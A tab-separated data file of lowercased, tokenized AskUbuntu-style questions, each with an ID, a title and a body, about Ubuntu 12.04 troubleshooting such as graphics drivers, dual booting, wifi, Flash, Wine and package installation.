189267	ubuntu 12.04 full screen without unity hub	i could n't find an answer for this , so i thought i would try here . my problem is , i have some games on wine that play in full screen mode but i ca n't really get them in full screen mode . when they start up , they end up with the gui 's `` hud '' overlapping the game which is really annoying and well kills the option to play the game . this has also happened in a few of my linux programs as well . while i wrote its a problem with unity , it really is n't limited to this though . i 've done full screen mode on unity and had the unity side bar and top menu overlap , i 've used gnome and had the same issue happen , gnome menu is in the top , cinnamon had the same issue . sometimes if i alt-tab out of it and back into the program it might remove the hud but that does n't always work , and lets face it , full screen mode that is killed by the gui just is n't something that can really be ignored . any suggestions or help would be highly welcomed . my laptop http : //www.cnet.com/laptops/asus-g53jw-a1-15/4507-3121_7-34210244.html edit seems so far to be an issue with unity and gnome being in 3d mode , and possibly an issue with my nvidia card and xserve ( i think that was it ... ) . going to unity/gnome 2d modes seem to help with this for the moment ...
189271	can not install ubuntu 12.04 : `` installation type '' screen has no options	i am new to ubuntu . i am trying to install ubuntu 12.04 lts from usb key ( in a dual-boot with windows 7 ) and i have exactly the same problem with the blank `` installation type '' described here : ubuntu 12.04 install problems.. installation type screen . no options i have followed the instructions in one of the comments , and giving the command sudo apt-get remove dmraid seems to solve the problem allowing me to see the partition . however , i have not proceeded from here since i do not understand whether having removed this `` dmraid '' will give me problems afterwards , e.g . damaging my data or ubuntu and/or windows installation . is `` dmraid '' something essential ? do i need to reinstall `` dmraid '' afterwards ? i would be really grateful if you could help me , i am very excited to try ubuntu , but so far i have only had frustrations with the installation ( i have also tried the ubuntu windows installer , getting exactly the same issue ) and it took me some time to find the solution in the comments above . thanks a lot .
189274	how can i troubleshoot flash player/hardware conflict ?	objective : have a web browser on my ubuntu install that can play youtube and hulu videos . also would like to understand problem so that i can fix it again if i change software . workarounds welcome , technical understanding and solution preferable . symptoms : flash does not run - can not make the right-click menu appear , an empty box is where video should be , changes to black box when hovering over other links . the `` the adobe flash plugin has crashed '' message does not appear with its sad lego face . can not activate proprietary graphics driver - causes system to reboot to a prompt . solutions tried : replaced os ( tried slackware 13.37 , fedora 17 , linuxmint 13 maya , gentoo , lubuntu , and even winxp . lubuntu confirmed to work , do n't remember how much tweaking , if any , this required . slack , fedora , mint , and gentoo all failed to run flash just like ubuntu ) many reinstalls of flash player via different methods , including cleaning up old installs first , also tried gnash and lightspark . replaced graphics card ( replaced his iceq radeon hd 4670 agp with older geforce 5700 le no change in problem ) flash does successfully work on winxp installation with catalyst agp hotfix driver applied , however i consider windows wholly unacceptable for web browsing due to lack of security . lubuntu install also works , however i do not want to be tied down to just using lubuntu on this computer . sysinfo : have latest versions of ubuntu , firefox , and flash on fresh ubuntu install . using gigabyte 7s748 motherboard with athlon xp 2800+ and 3 gb of ram with radeon hd 4670 agp card , also a dell soundblaster live series sound card ( due to malfunction of onboard sound on motherboard ) wired internet connection , maxtor 6y120l3 hdd , sony dvd rw aw-q170a , dell m993s monitor . notes : i do not know if the graphics driver issue and the flash troubles are linked . substitution of older graphics card having same flash troubles seems to suggest they are n't . my troubleshooting method is rather reductionist , consisting mainly of `` replace things until you find out what was causing the error by process of elimination '' only it seems that this must be a conflict which arises when software decides how to configure itself on my hardware . that is , i know the hardware can run flash , and i know that on other systems the same software can too , but somehow the combination fails . consequently i feel out of my depth . i will keep trying things off and on , but i have spent probably about 30 man-hours in the last 4 months working on this problem with no joy other than the lubuntu workaround . any help will be appreciated , i will be checking back and posting updates . any pertinent questions regarding me or my computer will be answered , outputs from config files can be accessed and posted ( idk which ones or what parts to post ) .
189280	slow transfer to external usb3 hard drive	trying to backup data from hard drive before reloading windows following some issue with its load . having trouble with the file transfer to a usb3/2 external hard drive ntfs . getting transfer speed of about 116.7kb/sec . in other words its taking about 5 hours to transfer 1.4gb . i 've got about 80gb to go . so the transfer is going to take 11days . seems a little on the slow side . am i missing something ? is there a way to make this faster . no issue with the external drive transferring this amount in windows . but do n't have that option at the moment .
189283	how do i install g77 ?	i am using ubuntu 12.04 lts ( 32bit-i386 ) in my desktop pc . i need g77 compiler for some specific applications . the app can only be installed after having g77 compiler . this specific app is designed based on g77 fortran compiler and ca n't be used with gfortran which is the standard available compiler in 12.04 lts . and guide me the procedure to install g77 in 12.04 . i have been trying apt-get update & apt-get install g77 after changing the sources.list file . after processing i am able to install g77 but when i try to compile a fortran program , it shows error /usr/bin/ld : can not find crt1.o : no such file or directory /usr/bin/ld : can not find crti.o : no such file or directory /usr/bin/ld : can not find -lgcc_s collect2 : ld returned 1 exit status please help me . i m struggling a lot to fix this .
189287	how do i decrease brightness of my laptop beyond the amount it specifies ?	is there a way i can decrease the brightness of my laptop ( dell 1558 ) beyond the amount it actually allows me to ? i tried redshift , it works okay , but i wanted to manually decrease the brightness . there was an app i came across in windows named dimmer and it worked perfectly , but i could n't find its ubuntu counterpart .
189288	xorg , nvidia , log-in all hosed - how can i completely reset graphics set-up/settings ?	i just did a fresh install of mythbuntu 12.04.1 on my intel mb with nvidia 9500gt graphics card . hardware 's been working great with 10.10 for about 2 years . background : ( optional - feel free to skip to question ) i was trying to get my component video output to generate 720p , messing around with the nvidia drivers , and now the entire display system is hosed . i can ssh in and get a terminal . depending on which nvidia package i install/remove , i get : garbage on screen ( after i `` apt-get remove nvidia* '' ) a low-res graphical log-in screen where i can log in as fred or guest . if i log in as fred , it displays some text mode status line then goes right back to the log-in screen . if i log in as guest , i actually get the full ubuntu desktop , but i need to be able to log in as fred . other times i get an error : `` api mismatch : the nvidia kernel module has version 304.43 , but this nvidia driver component has version 295.49 . '' i 've googled around , including trying this thread with the same error message , but to no effect . question : how can i just reset x settings , drivers , everything display-related to the exact same way it was after a fresh install ?
189293	need help in creating diskspace script	i need help in creating a script that will run once a day in afternoon and collect the information of each partition ( disk space , total and used ) and send it to my email . please help im very very new in this scripting thing .
189297	flash video streaming choppy for chrome , alright for firefox	i 'm using ubuntu 12.04.1 , chrome 21 and firefox 15 . flash player 11.2 has been installed , and i 've just started using ubuntu ... yesterday . and i 'm using a lenovo t61 . the problem is that it does n't matter if it 's youtube or vimeo or some other flash player , it streams fine on chrome but every 30 seconds or so , there is a pause in video playback ( with audio continuing ) before it catches up , skipping quite a few seconds of video . it works perfectly fine in firefox , and i 've tried disabling pepperflash/libpepflashplayer.so in chrome but it does n't seem to affect the performance . anyone know how to work around this ? it 's more a problem of convenience because i do n't like the idea of having to switch between chrome and firefox just to watch videos .
189300	doubled auto start entry for google chrome ?	it seems that chrome adds two autostart entries to the gnome auto start configuration : google chrome = > /opt/google/chrome/google-chrome -- no-startup-window google chrome service = > /opt/google/chrome/chrome -- type=service is this correct ? because i often get errors about `` chrome already running '' .
189302	graphics card not found ?	i just installed ubuntu 12.04 and absolutely love it , but when i go to system details it says graphics unknown , is this a problem ? i have a acer aspire 5750 , and a intel 3000 hd graphics card.there also no additional drivers to be installed , but on another computer i needed to install additional drivers and it showed the grapics card . is there a problem with intel graphics in combination with ubuntu ?
189304	no sound from external subwoofer `` sonic master '' on an asus n76vm	a few weeks ago i bought an asus n76vm notebook looking forward to it 's 'superior sound ' . this sound system compromises an external subwoofer which amplifies bass and is connected to a special output jack . ubuntu 12.04 , however , does not detect this subwoofer . how could this be solved ? any help would be gratefully appreciated http : //www.asus.com/notebooks/multimedia_entertainment/n76vm/ # specifications
189307	ca n't connect to wireless without typing sudo modprobe b43 in terminal	i just upgraded to 12.04 on an old acer travelmate 5320 using broadcom 4311 . i was n't able to connect to the internet through the wireless for a few days . it did n't even display wireless networks . i was finally able to make it work by following the instructions found here : http : //linuxwireless.org/en/users/drivers/b43 # supported however , each time i log on to the computer i have to go to the terminal and type sudo modprobe b43 to make the wireless work . is there somehow i can avoid this ? i have used ubuntu for many years but always relied on other people to help me with the technical stuff . the terminal is alien to me so i literally follow online forum instructions without knowing what i 'm doing . also , i tried many many things before i managed to make it work . so i 'm worried i may have installed something that now conflicts with whatever the sudo modprobe b43 does . thank you
189316	how to capture video	how to capture an online video stream and edit ( convert into other formats , make a clip , etc . ) it in ubuntu 12.04 lts ?
189317	ubuntu 12.04 fails to recognise my blu-ray drive	this blu-ray drive was working fine in windows ( before windows became corrupted and i used the opportunity to move to linux ) . i have checked sata connections and the drive is picked up by the bios but there is no reference to it in ubuntu . the command sudo lshw | grep cdrom returns nothing and a full lshw has no reference to the drive . i 'm sure there must be support for most rom drives in linux . dmesg reports the following for the drive : [ 1.220625 ] ata3 : sata max udma/133 cmd 0x9e0 ctl 0xbe0 bmdma 0xc400 irq 20 [ 1.688036 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 1.696153 ] ata3.00 : atapi : atapi ihos104 , wl0b , max udma/100 [ 1.712123 ] ata3.00 : configured for udma/100 [ 6.712036 ] ata3.00 : qc timeout ( cmd 0xa0 ) [ 6.712039 ] ata3.00 : test_unit_ready failed ( err_mask=0x4 ) [ 7.180030 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 7.204109 ] ata3.00 : configured for udma/100 [ 12.204028 ] ata3.00 : qc timeout ( cmd 0xa0 ) [ 12.204030 ] ata3.00 : test_unit_ready failed ( err_mask=0x4 ) [ 12.204033 ] ata3 : limiting sata link speed to 1.5 gbps [ 12.204035 ] ata3.00 : limiting speed to udma/100 : pio3 [ 12.672031 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 12.696108 ] ata3.00 : configured for udma/100 [ 17.696032 ] ata3.00 : qc timeout ( cmd 0xa0 ) [ 17.696034 ] ata3.00 : test_unit_ready failed ( err_mask=0x4 ) [ 17.696035 ] ata3.00 : disabled [ 17.696043 ] ata3 : hard resetting link [ 17.696045 ] ata3 : nv : skipping hardreset on occupied port [ 18.164030 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 18.164036 ] ata3 : eh complete what does test_unit_ready failed ( err_mask=0x4 ) portend and has anybody here overcome a similar problem in ubuntu 12.04 . a search brings fairly arcane suggestions for other ubuntu versions with other kernels . is it really likely that 'll have to compile my own kernel ( i rather hoped to avoid anything so drastic ) ? edit=============================================================== the following discussion concerning the same drive seems to have met with success : http : //www.gossamer-threads.com/lists/engine ? do=post_view_flat ; post=1170613 ; page=1 ; mh=-1 ; list=linux ; sb=post_latest_reply ; so=asc question , am i right to assume that applying a patch that old made specifically for another kernel would be foolhardy ? tia , tony martin
189318	missing /lib/libc.so.6	software that i 'm installing requires /lib/libc.so.6 , but it 's not in place : $ > ls -l /lib/libc* lrwxrwxrwx 1 root root 14 2011-10-09 06:02 /lib/libcap.so.2 - > libcap.so.2.20 -rw-r -- r -- 1 root root 18832 2011-02-16 03:42 /lib/libcap.so.2.20 -rw-r -- r -- 1 root root 1620736 2012-05-23 07:19 /lib/libcrypto.so.0.9.8 libc and libc6-dev are installed . running apt-get upgrade glibc does not solve this . what should i do to resolve this dependency ?
189324	how to run terminal script by clicking desktop icon ?	i need to run `` v4l2-ctl -i 2 `` in terminal , by clicking on a desktop icon . right now , i have to manually open terminal , type in this command , and it sets the video input of my tv card in ubuntu . then i can open the tv player to watch tv . for some reason , the tv card input does n't stay set . it is a pain to have to open terminal and run this command every time i want to watch tv . i want to just be able to click a desktop icon , and have it automatically open terminal , and run this command , and then shut terminal by itself . ( the tv player already has an desktop icon ) i 've never done any kind of script before , so speak s l o w l y ... .lol -thanks
189326	how to create a limited user account for ssh	i need to create a new user account , that should have full access to a single dir within the linux hdd , unlike the root user that has access to everything . and this account would be used via ssh for file sharing on the network . how do i get started ?
189327	how to check battery status when acpi is off ?	i got acpi turned off with the kernel parameter acpi=off . but now i can not see my battery state in any way . is there a way to check battery state when acpi is still off ?
189334	is there any way to open more than one folders ( home folder , videps etc.. ) by clicking the 'files ' icon on the unity bar ?	why only one nautilus window manager is opens when clicking on the 'files ' icon on the unity bar ? i need to open two or more homefolder windows by clicking on the 'files ' icon on the unity pane . i can not create more than one nautilus window manager unless i tap superkey ( windows key ) and type homefolder , videos etc or typing the same in gnome-do . is there any way to open more than one folders ( home folder , videos etc.. ) by clicking the 'files ' icon on the unity bar ? ?
189346	is it possible to use a font in the terminal that is n't monospace	yeah , so there 's the question . i wondered if it was possible to use the ubuntu font in the terminal . i know how to change the font , but using anything except a monospace font does n't really work very well . is there a way to use a non-monospace font where it looks ok ?
189347	how can i uninstall nvidia proprietary drivers ?	ok , so i know that other people asked exactly the same ... but i just moved from nouveau to nvidia using this tutorial , and the new drivers are really , really , really slow . how can i remove nvidia drivers and recover the open ones ?
189354	lenovo b570e wifi is not working on 11.04	can any body tell me how to start my wifi ? it is not working with 11.04 . i am new to ubuntu . please any body give me the code to compile and how it will work . i am really stuck with this problem . my laptop model is lenovo b570e . please help me out .
189357	xfce in xubuntu 12.04 keymap sitching	i want to setup keymap switching in xubuntu following way : - left winkey for toggling keymaps - `` scroll lock '' led for alternative keymap indication as it goes , it not so easy to setup by means of default xfce tools .
189360	exec : 2508 : /tmp/install.dir.30906/linux/resource/jre/bin/java : not found	sudo add-apt-repository ppa : ferramroberto/java sudo apt-get update sudo apt-get install sun-java6-jre sun-java6-plugin sun-java6-fonts already run above , then setup a software sybase sudo ./setup.bin exec : 2508 : /tmp/install.dir.30906/linux/resource/jre/bin/java : not found
189370	is it possible to set the launcher to autohide on only one display ?	i would like to access the launcher on my smaller notebook panel without wasting precious space . as space is not an issue on my external panel , there 's no reason to autohide the launcher there . is there any way of setting up a hybrid launcher display/autohide mode , in which the autohide mode is active on one display only ?
189372	how can i install drivers for nvidia gtx 560 ?	i have ubuntu 12.04.1 and nvidia gtx 560 the `` additional drivers '' in system setting is empty ! how can i install the driver ... ? should i download them from the geforce.com ? thanks !
189379	how do i completely uninstall tv maxe ?	i use ubuntu precise pangolin 12.04 . i installed tv maxe using the commands below : sudo add-apt-repository ppa : venerix/blug sudo apt-get update sudo apt-get install tv-maxe how do i completely uninstall tv maxe ? thank you .
189382	is it possible to make firefox look like in windows in lubuntu ?	i guess that does not make sense in unity , because it has a special way of changing the classical display of the main menu and to disable the option of un/checking it . in windows , after hiding main menu , firefox creates that upper-left button that has become the image of firefox 4+ , but in lubuntu un-checking the main menu would not have this effect , but would result in the looks common to firefox 3.6 . is that new look available somehow in lubuntu ? ( default theme ) ( rein theme )
189383	install ubuntuon uefi mode on hp h8-1360t	this is a new computer that can only boot in uefi mode . ( or at least i do not know how to switch to normal bios mode ) . i am not able to install ubuntu 12.04.1 or ubuntu 12.10 using the livecd . the live cd does not boot properly . i get error message with subsequent kernel panic . it came with windows 7 preinstalled . bcdedit indicated that windows in uefi mode . the problem is not solved even when i disconnect the windows disk .
189385	screen shifted on an hp lp2065	my graphics performance with ati radeon hd3200 used to be terribly slow with unity ( even the 2d performance ) . installing the proprietary fglrx driver via the os interface caused errors and problems . so i opted for a manual installation . i downloaded the correct driver for 64 bit from amd : amd-driver-installer-12.6-legacy-x86.x86_64.zip . this is the latest version to support the hd3200 . i enabled the restricted repositories and created the installation package . the manual installation worked without error messages , testing with fglrxinfo and fgl_glxgears works , everything is fast now . my problem , however , is that after the first reboot , the whole screen is shifted about an inch to the left , so that i can not see what is at the left margin of the screen . i could probably correct this via my monitor settings , but then i would have to change it back everytime i booted to windows . for the xorg.conf configuration i just used the recommendation i found on a ubuntu helpsite : sudo amdconfig -- initial -f i then changed my graphics card name in the device section . still the same screen problem . the `` monitor '' section in the original xorg.conf file reads like this : section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection somewhere i found an info where someone recommended these settings for the same monitor i have : hp lp2065 with 1600 x 1200 . the settings were : section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' subsection `` display '' virtual 2560 1200 modes `` 1600x1200 '' `` 1280x1024 '' `` 1024x768 '' `` 640x480 '' endsubsection unfortunately , i am still a linux newbie and destroyed the x-server and had to reinstall everything because i had no backup of the xorg.conf file ... so maybe someone has an idea what the problem might be . i really would like to use the proprietary driver without having to adjust the monitor itself . maybe i just need the correct xorg.conf settings ... ? any ideas ?
189386	hard drive not detected in ubuntu 12.04 ?	i had installed ubuntu 12.04lts in this summer and all was going fine , but then my computer was switched off in the middle of loading the bios . when i boot , its not recognizing my hard drive in which i had installed ubuntu 12.04lts . i even tried to boot ubuntu from the live cd but then too its not recognizing the hard drive . and the bios is saying `` no boot loader found '' .
189388	ubuntu installed via wubi fails to boot after windows 7 is run	original posting started sep 21 : i am trying to use the wubi installation process to create a ubuntu 12.04 / windows 7 dual boot setup on my windows 7 machine ( dell inspiron 17r ) . the installation initially works fine , and i am able to load ubuntu several times after selecting it from the boot menu . however , when i boot into windows 7 it seems to corrupt the ubuntu boot process , because after running windows 7 , ubuntu wo n't boot on the machine . it is still listed as an option in the boot menu , but when it is selected , the machine does one of the following : hangs at the load-screen and says that ubuntu is preparing to run for the first time ( although it is n't the first time the os has been loaded ) hangs with a black screen and does nothing i have uninstalled ubuntu and then reinstalled it ( using wubi ) three times . each time ubuntu initially boots okay ( including rebooting the laptop into ubuntu several times . ) however , whenever i switch over and boot into windows 7 it breaks the ubuntu installation . windows 7 continues to boot and work fine without issues . i have successfully installed ubuntu using wubi onto a different windows 7 machine before without problems ... it seems that there is something different about this laptop configuration . i am not sure how to debug the issue . i see no error messages during the ubuntu boot process when it hangs and am not sure how to debug this . updated info : i made some progress on this issue , but am now stuck with a broken bootloader . i was able to get the ubuntu installer to install version 12.04 on the system , but at the moment the boot process is not working and right at boot it hangs and says : “bootmgr is missing” the most recent boot debug info i have is : http : //paste.ubuntu.com/1218834 . here is what i did : 1 ) turned off intel rapid start technology in the windows control panel on the taskbar , but leave raid 0 setup with the intel tech in the bios . after reading into this a bit , i believe the setup on this system is fakeraid/ software raid/sataraid where bios makes the 2 sata drives look like raid to the os . according to intel , linux should support this ( http : //download.intel.com/design/intarch/papers/326024.pdf ) and the preferred mechanism is mdadm in linux rather than the dmraid approach which is now only in bug-support mode by the intel people . i want to keep this feature active to maintain a good performance of windows 7 while also setting up a dual-boot environment . 2 ) inside windows , using their disk management tool , i shrunk the windows partition by 30 gb to free up space for ubuntu . 3 ) i ( temporarily ) disabled the intel rapid start feature using the taskbar controls inside windows 7 . i did not disable the feature in the bios and left the bios configured with sataraid active . 4 ) it was possible to boot the computer into ubuntu 12.04 using a livecd installed on a usb stick . 5 ) next , confirm that the partitions looked the same from within ubuntu as they did when i looked at them inside windows 7 from the disk manager tool . 6 ) install gparted package and use it to configure the partitions in prep for linux install . created 1 extended partition subdivided into three logical partitions ( swap , root , and home ) 7 ) ran the ubuntu installer , used the manual partition control rather than the automatic option for installing windows 7 and ubuntu side-by-side . 8 ) when the machine rebooted , it went straight into windows 7 without any sort of grub2 menu . 9 ) boot into ubuntu from livecd usb stick , install boot-repair and use it to try and fix the boot loader process . 10 ) the boot process now starts up ubuntu 12.04 okay , but there was no option to load windows 7 . 11 ) install boot repair and try to force it to load windows 7 first ( although , admittedly , not to clear on how best to try this . i tried to get it to refresh the mbrs . ) 12 ) on reboot the computer says “bootmgr is missing” and hangs…no grub2 menu now i’m not sure how to proceed . i think the partitions are setup okay and i actually have ubuntu 12.04 installed okay and windows 7 installed okay , too , but how do i get a grub2 menu setup that will allow me to select between the two oses ? -- final update on oct 25 : so , after a lot of pain investigating this , i gave up and installed linux onto an external usb hard drive , thus keeping the raid setup across the internal hdd and ssd independent of the linux installation . from inside windows it was possible to configure the boot menu to give an option to boot linux off the external usb drive . this raid hardware configuration does n't seem to be supported by the wubi installer , standard ubuntu iso installer/live cd , or the alternative ubuntu iso installer . a few notes on what partly worked and did n't work : after booting into ubuntu using the live cd , it is possible to use 'dmraid -ay ' to activate the raid0 partitions , and it is possible to use gparted to partition them . if the installer is then subsequently run , it is able to see the partitions and proceed with installation , however , it is unable to install the boot loader at the end , and i was not able to resolve that . also , fundamentally , it seemed like the dual-boot setup was unstable . apparently mdadm is actually preferable to dmraid for managing raid arrays . however , when i tried to uninstall dmraid and install mdadm , mdadm was not able to see these raid arrays , whereas dmraid had been successful . when i tried to get mdadm to recognize the raid setup , it says that it does n't support raid0 on 1 device . perhaps there is something unusual about how the intel fakeraid is setup in this setup . anyway , after wrecking the boot loader ( tried using boot repair program in ubuntu ) and reinstalling windows multiple times , this should work well enough . ( the windows setup is my primary os , and linux is secondary so i do n't want to take the performance penalty of disabling the fakeraid setup . ) the windows installer needs me to manually provide the hd controller drivers for it to work right , too , so i think this is a fairly new type of configuration . maybe a future version of the ubuntu installer will be able to work with this kind of system . for now running off an external drive will work okay . some potentially useful links : https : //wiki.archlinux.org/index.php/installing_with_fake_raid # load_dmraid http : //blog.neolocus.com/2012/04/ubuntu-12-04-lts-and-soft-raid-with-mdadm/
189391	how can i make rhythmbox recognize song titles and album artists written in arabic ?	i 'm new in ubuntu , i 'm running ubuntu 12.04.1 lts x64 , and i have some songs in arabic . rhythmbox plays them alright but it does n't show the album artist or the song titles in arabic characters . i tried to change the regional format to arabic but it didnt help . in a similar situation in windows , the solution is to change the non-unicode language to arabic . i dont know if the solution here is the same , and if it is how to do it . i am liking ubuntu very much and its a pity that i have this problem , it would be perfect for me if it can be fixed . any help or support would be appreciated .
189392	how to produce mathtype equations in a ms word document under ubuntu ?	i am asked to type some math formulas that can work in microsoft office and mathtype equation editor . can you recommend some ways to produce mathtype equations in a ms word document under ubuntu ? i only have access to ubuntu 12.04 near me , there is libreoffice available under ubuntu as well , but i am used to type math formulas in latex . i work under ubuntu , preferably with latex , but libreoffice or openoffice being also acceptable since it is still under ubuntu . thanks and regards ! one way i found is to install mathtype under wine in ubuntu . it works , but i can not copy the equations from mathtype into a .doc document opened in libreoffice writer .
189394	partitioning windows 7 so i can use ubuntu	i have been recording happily using audacity for many years but after upgrading to windows 7 , the latency has meant that recording music is impossible . my mate suggested partitioning my hard drive , installing ubuntu on it and then using this alongside windows . he reckons i can use music recording software then on the partitioned ubuntu drive without the latency problems . a few questions : is my mate correct ? how do i go about doing the partition and installing ? what music recording software would you recommend ?
189397	how to see all icons in dash home ?	when clicked on dash home , it shows only recent icons i want to see all the installed application icons when clicked on dash home ... . and can i increase the size of the dash home window ? because it occupies only 1/4th of the screen . is there any way ? thanks : )
189399	can not get past login screen	i have lubuntu 12.04 , and it was working fine until i installed something and i do not remember exactly what i installed because i was trying to build a ruby gem and it required a lot . now i rebooted and i can not log in , well , i can but when i do lxde apparently can not continue and returns to the login screen . i created another user from my console screen ( i can login there ) , and the other user can login . so i removed my . * directories from my home directory , but it did not help . any suggestions ?
189405	how do i fix firefox broken firefox open with ?	i continue to have issues with getting firefox 15 to properly remember what apps to use to open items with . i 'd written previously regarding properly associating .deb files , and the suggested solution sort of works , but at this point firefox does n't want to properly `` remember '' the `` other '' selection that i 've chosen . see the screenshot below , where i 've chosen azureus ; however , firefox wo n't allow me to `` do this automatically from now on . '' if i click ok here , azureus/vuze opens , but the next time i click on a .torrent link i will be back to the same issue . i wondered whether my profile is corrupt and created a new one , but am having the same issue .
189408	unity2d + compiz make chromium tabs unmovable	i changed metacity to compiz . everything works great . however , when i use chromium , as i hold the tab to organize them , the tab ca n't merge to the original window . so later on , it opens a new window . so , how can i solve this ?
189409	why to use ppa ?	why everyone recommends using ppa ? for example ... why not just : sudo apt-get install grub-customizer and why : something like this ... sudo add-apt-repository ppa : xyz/grub-customizer sudo apt-get update sudo apt-get install grub-customizer edit : ok then how to remove ppa thats added before ? is there any remove-like command ? thanks
189410	how do i reinstall windows 7 while keeping my dual boot configuration ?	i have dual-boot ubuntu 12.04 and windows 7 32 bit and i want to format my windows 7 partition to put windows 7 64 bit.. how can i do this ? ps : i have the windows 7 64 bit ready in my dvd !
189411	shutdown problem in ubuntu 12.04 lts	i am using ubuntu 12.04 lts and i 'm getting a serious bug : when i try to shutdown my system , my screen goes blank but my cpu fan keeps running , i.e . the processor is still working but i am not able to see anything on my screen . i need to power off my machine for a complete shutdown . i am using a desktop with an intel p4 processor . i found a solution on the internet involving modifying the grub config file . but even after doing so i was n't able to eliminate the issue .
189414	sound stops if laptop charger unplugged on a lenovo g570	the sounds stops immediately if i unplug the laptop charger and nothing will make it produce sound again even with my own sound devices connected to the laptop ! i 'm using ubuntu 12.04 lts on a g570 lenovo .
189417	what are the default games that come with a desktop installation ?	is there a list of the default games for each/any one version of ubuntu desktop ?
189420	how to change sample text in font installer	i have several japanese fonts but do not want to install them all . i would like to preview them before installing . in icon view i can get a very rough idea of the style of the font as it shows aa . when i open the font i am presented with a dialog box which shows a sample of the font with the sentence the quick brown fox jumped over the lazy dog . i would like to change this sample text to japanese text to get a fuller preview of the font . is it at all possible ? i suspect i might have to edit and compile source , not something i 'm very familiar with .
189424	is /home encryption useful on a server ?	i 've got a question about the use of encryption : i set up a ubuntu 12.04 server to use it as a router , file server for backups and webserver . of course , it is probably not the best idea to put backups on the same system as a web server , but it is only for private usage and i do n't want to spend too much money . so i thought it is not a bad idea to set up /home-encryption for the backup-user-account with which i do my backups . but in the same moment , another quesiton arises : does it still makes sense ? via ssh , root login is disabled . and access to the /home-folder of that user is reduced to the user itself . so the only scenario to access the /home-folder is to connect keyboard/display to the server , login as root and change to /home . or have i overseen a scenario ? in case i am right , you can only access the /home-folder from `` outside '' as the backup-user . but than , encryption also does n't make sense anymore . am i right about that thoughts ? or do you still see a way to access the /home-folder of the backup user so that encryption still makes sense ? thanks for your help in advance !
189429	upgraded to 12.04 now wi-fi does n't work	my laptop 's wi-fi stopped working when i upgraded to ubuntu 12.04 ( wired works ) . i just reinstalled 12.04 over my old 12.04 on which wi-fi did n't work either in an attempt to restore any settings i may have accidentally changed , but it still does n't work . i also used a wired connection to install updates in case this bug has been fixed , but it has not . here is the result of sudo lshw -class network : *-network description : wireless interface product : centrino wireless-n + wimax 6150 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 67 serial : 40:25 : c2:5f:5b : f4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-29-generic-pae firmware=41.28.5.1 build 33926 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:51 memory : de800000-de801fff *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c0 serial : 14 : da : e9 : c0 : da:78 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:54 memory : dd400000-dd43ffff ioport : a000 ( size=128 ) here is rfkill list all : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-wimax : wimax soft blocked : no hard blocked : no lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 8087:07d6 intel corp . bus 001 device 004 : id 13d3:5710 imc networks bus 002 device 003 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth bus 003 device 003 : id 0781:5530 sandisk corp. cruzer lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 02:00.0 network controller : intel corporation centrino wireless-n + wimax 6150 ( rev 67 ) 03:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 04:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 )
189430	wine : x development files not found	i downloaded the wine-1.4-rc5.tar.bz2 . i ran the tools/wineinstall in terminal . after some time i get this error . checking for x ... no configure : error : x development files not found . wine will be built without x support , which probably is n't what you want . you will need to install development packages of xlib/xfree86 at the very least . use the -- without-x option if you really want this . configure failed , aborting install . i am using ubuntu 10.04 . the installation wo n't finish . can i fix this and make wine install ?
